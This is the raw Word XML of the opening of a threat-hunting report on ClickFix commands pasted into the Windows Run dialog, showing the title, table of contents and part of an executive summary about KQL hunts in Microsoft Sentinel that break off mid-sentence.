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5pyhlwcruiak" w:id="0"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="1371600" cy="1371600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="901" name="deathcon-logo.png" descr="DEATHCon 2026 logo"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image1.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rIdLogo1"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1371600" cy="1371600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000002">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000003">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:spacing w:after="0" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="100"/>
          <w:szCs w:val="100"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_uj3cj31nu85e" w:id="1"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="100"/>
          <w:szCs w:val="100"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Threat Hunting Exercise</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000004">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_iw8q2i2v7idg" w:id="2"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000005">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:leader="none" w:pos="4252"/>
          <w:tab w:val="right" w:leader="none" w:pos="8504"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000006">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_zgf3ts9o7n7n" w:id="3"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ClickFix: commands pasted into Win+R (RunMRU)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000007">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:leader="none" w:pos="4252"/>
          <w:tab w:val="right" w:leader="none" w:pos="8504"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000008">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_4g4c3dqakgem" w:id="4"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000009">
      <w:pPr>
        <w:keepNext w:val="1"/>
        <w:keepLines w:val="1"/>
        <w:spacing w:after="0" w:before="480" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Table of Contents</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000A">
      <w:pPr>
        <w:keepNext w:val="1"/>
        <w:keepLines w:val="1"/>
        <w:spacing w:after="0" w:before="480" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="2e75b5"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="2e75b5"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:id w:val="-2099273019"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique w:val="1"/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtContent>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000B">
          <w:pPr>
            <w:tabs>
              <w:tab w:val="right" w:leader="none" w:pos="9020"/>
            </w:tabs>
            <w:spacing w:after="0" w:before="120" w:line="240" w:lineRule="auto"/>
            <w:rPr/>
          </w:pPr>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
            <w:instrText xml:space="preserve"> TOC \h \u \z \t "Heading 1,1,"</w:instrText>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_2apts6qn50ez">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Executive Summary</w:t>
              <w:tab/>
              <w:t xml:space="preserve">3</w:t>
            </w:r>
          </w:hyperlink>
          <w:r>
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000C">
          <w:pPr>
            <w:tabs>
              <w:tab w:val="right" w:leader="none" w:pos="9020"/>
            </w:tabs>
            <w:spacing w:after="0" w:before="120" w:line="240" w:lineRule="auto"/>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="_hsg34282h7ef">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Hunting Hypothesis</w:t>
              <w:tab/>
              <w:t xml:space="preserve">4</w:t>
            </w:r>
          </w:hyperlink>
          <w:r>
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000D">
          <w:pPr>
            <w:tabs>
              <w:tab w:val="right" w:leader="none" w:pos="9020"/>
            </w:tabs>
            <w:spacing w:after="0" w:before="120" w:line="240" w:lineRule="auto"/>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="_4y7qgchtrmm4">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Scope and Limitations</w:t>
              <w:tab/>
              <w:t xml:space="preserve">5</w:t>
            </w:r>
          </w:hyperlink>
          <w:r>
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000E">
          <w:pPr>
            <w:tabs>
              <w:tab w:val="right" w:leader="none" w:pos="9020"/>
            </w:tabs>
            <w:spacing w:after="0" w:before="120" w:line="240" w:lineRule="auto"/>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="_78fcq79eiwqq">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Background and Threat Intelligence</w:t>
              <w:tab/>
              <w:t xml:space="preserve">6</w:t>
            </w:r>
          </w:hyperlink>
          <w:r>
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000F">
          <w:pPr>
            <w:tabs>
              <w:tab w:val="right" w:leader="none" w:pos="9020"/>
            </w:tabs>
            <w:spacing w:after="0" w:before="120" w:line="240" w:lineRule="auto"/>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="_9asiyftdowrf">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">MITRE ATT&amp;CK</w:t>
              <w:tab/>
              <w:t xml:space="preserve">7</w:t>
            </w:r>
          </w:hyperlink>
          <w:r>
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000010">
          <w:pPr>
            <w:tabs>
              <w:tab w:val="right" w:leader="none" w:pos="9020"/>
            </w:tabs>
            <w:spacing w:after="0" w:before="120" w:line="240" w:lineRule="auto"/>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="_ss889l6lkwo">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Methodology</w:t>
              <w:tab/>
              <w:t xml:space="preserve">8</w:t>
            </w:r>
          </w:hyperlink>
          <w:r>
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000011">
          <w:pPr>
            <w:tabs>
              <w:tab w:val="right" w:leader="none" w:pos="9020"/>
            </w:tabs>
            <w:spacing w:after="0" w:before="120" w:line="240" w:lineRule="auto"/>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="_my9ycng2iqs">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Findings</w:t>
              <w:tab/>
              <w:t xml:space="preserve">9</w:t>
            </w:r>
          </w:hyperlink>
          <w:r>
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000012">
          <w:pPr>
            <w:tabs>
              <w:tab w:val="right" w:leader="none" w:pos="9020"/>
            </w:tabs>
            <w:spacing w:after="0" w:before="120" w:line="240" w:lineRule="auto"/>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="_ernanspefdji">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Recommendations / Action Plan</w:t>
              <w:tab/>
              <w:t xml:space="preserve">11</w:t>
            </w:r>
          </w:hyperlink>
          <w:r>
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000013">
          <w:pPr>
            <w:tabs>
              <w:tab w:val="right" w:leader="none" w:pos="9020"/>
            </w:tabs>
            <w:spacing w:after="0" w:before="120" w:line="240" w:lineRule="auto"/>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="_bsveko6blhc">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Conclusion</w:t>
              <w:tab/>
              <w:t xml:space="preserve">12</w:t>
            </w:r>
          </w:hyperlink>
          <w:r>
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000014">
          <w:pPr>
            <w:tabs>
              <w:tab w:val="right" w:leader="none" w:pos="9020"/>
            </w:tabs>
            <w:spacing w:after="0" w:before="120" w:line="240" w:lineRule="auto"/>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="_4jsepxhop1t1">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Appendix A: IOC List</w:t>
              <w:tab/>
              <w:t xml:space="preserve">13</w:t>
            </w:r>
          </w:hyperlink>
          <w:r>
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000015">
          <w:pPr>
            <w:tabs>
              <w:tab w:val="right" w:leader="none" w:pos="9020"/>
            </w:tabs>
            <w:spacing w:after="0" w:before="120" w:line="240" w:lineRule="auto"/>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="_y4cyhcs0qayy">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Appendix B: Detailed Queries and Results - Microsoft Sentinel</w:t>
              <w:tab/>
              <w:t xml:space="preserve">14</w:t>
            </w:r>
          </w:hyperlink>
          <w:r>
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000016">
          <w:pPr>
            <w:tabs>
              <w:tab w:val="right" w:leader="none" w:pos="9020"/>
            </w:tabs>
            <w:spacing w:after="0" w:before="120" w:line="240" w:lineRule="auto"/>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="_11wnj43fcr1z">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Appendix C: Incident Timeline</w:t>
              <w:tab/>
              <w:t xml:space="preserve">17</w:t>
            </w:r>
          </w:hyperlink>
          <w:r>
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000017">
          <w:pPr>
            <w:tabs>
              <w:tab w:val="right" w:leader="none" w:pos="9020"/>
            </w:tabs>
            <w:spacing w:after="0" w:before="120" w:line="240" w:lineRule="auto"/>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="_gdc339hojzqr">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Appendix D: Evidence of Control Implementation</w:t>
              <w:tab/>
              <w:t xml:space="preserve">19</w:t>
            </w:r>
          </w:hyperlink>
          <w:r>
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000018">
          <w:pPr>
            <w:tabs>
              <w:tab w:val="right" w:leader="none" w:pos="9020"/>
            </w:tabs>
            <w:spacing w:after="0" w:before="120" w:line="240" w:lineRule="auto"/>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="_46lvgsjnspqz">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Appendix E: References and Sources</w:t>
              <w:tab/>
              <w:t xml:space="preserve">20</w:t>
            </w:r>
          </w:hyperlink>
          <w:r>
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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2apts6qn50ez" w:id="5"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">EXECUTIVE SUMMARY</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001B">
      <w:pPr>
        <w:spacing w:after="0" w:before="200" w:line="264" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In September 2026, the XXXX Threat Hunting team ran an </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">intelligence-driven</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> hunt over the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Microsoft Defender for Endpoint</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> telemetry of XXXX, queried in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Microsoft Sentinel</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. The hunt did not start from an alert: it started from a question. Public intelligence ranks </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ClickFix</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> as the leading initial access vector of the past year, and the question was whether any user in the fleet had pasted a malicious command into the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows Run dialog (Win+R)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001C">
      <w:pPr>
        <w:spacing w:after="0" w:before="200" w:line="264" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We ran </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">7 KQL queries</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> across the entire fleet, chained so that each result raised the next question, and one more is planned as the next hunt.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001D">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Results:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:before="80" w:line="264" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Hypothesis confirmed.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> One host (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">XXXX-01</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) recorded </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">4 PowerShell executions</w:t>
      </w:r>
      <w:r>
